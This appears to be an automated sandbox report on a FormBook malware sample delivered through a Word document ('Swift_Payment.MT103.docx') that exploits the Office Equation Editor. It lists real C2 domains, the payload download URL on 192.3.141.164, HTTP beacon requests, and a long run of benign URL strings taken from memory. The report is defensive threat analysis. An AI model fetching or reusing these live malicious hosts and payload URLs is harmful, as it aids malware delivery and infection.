"freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Show sources

Source: Swift_Payment.MT103.docx

Virustotal: Detection: 8%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Source: 6.2.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000006.00000002.2224936502.0000000000370000.00000040.00000001.sdmp
Source:	Binary string: SByteTypeInfo.pdb source: vbc.exe, vbc.exe.3.dr

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	5_2_0431A0D0
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	5_2_04319F50
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	6_2_00416CA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 4x nop then pop edi	8_2_00096CA0

Source: global traffic

DNS query: name: xy2.eu

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 93.157.97.6:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 93.157.97.6:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 93.157.97.6:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49171 -> 93.157.97.6:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49175 -> 93.157.97.6:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49176 -> 93.157.97.6:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.rocketschool.net/nf2/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 13:59:27 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7Last-Modified: Fri, 11 Jun 2021 00:12:45 GMTETag: "e5400-5c4725dfdba60"Accept-Ranges: bytesContent-Length: 939008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b aa c2 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a8 0b 00 00 a8 02 00 00 00 00 00 fe c5 0b 00 00 20 00 00 00 e0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 c5 0b 00 4b 00 00 00 00 00 0c 00 88 a3 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 5f c5 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a6 0b 00 00 20 00 00 00 a8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 e0 0b 00 00 02 00 00 00 ac 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 a3 02 00 00 00 0c 00 00 a4 02 00 00 ae 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 93.157.97.6 93.157.97.6

Source: Joe Sandbox View	ASN Name: DIGICABLEHU DIGICABLEHU
Source: Joe Sandbox View	ASN Name: OGICOMPL OGICOMPL

Source: global traffic	HTTP traffic detected: GET /e9yj HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.164

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5FAB51B-61BE-41BF-89DB-AF92964D1C77}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /e9yj HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: xy2.eu

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Fri, 11 Jun 2021 14:00:57 GMTContent-Type: text/htmlContent-Length: 169Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>

Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: oti on 192.3.141.164.url.0.dr	String found in binary or memory: http://192.3.141.164/oti/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
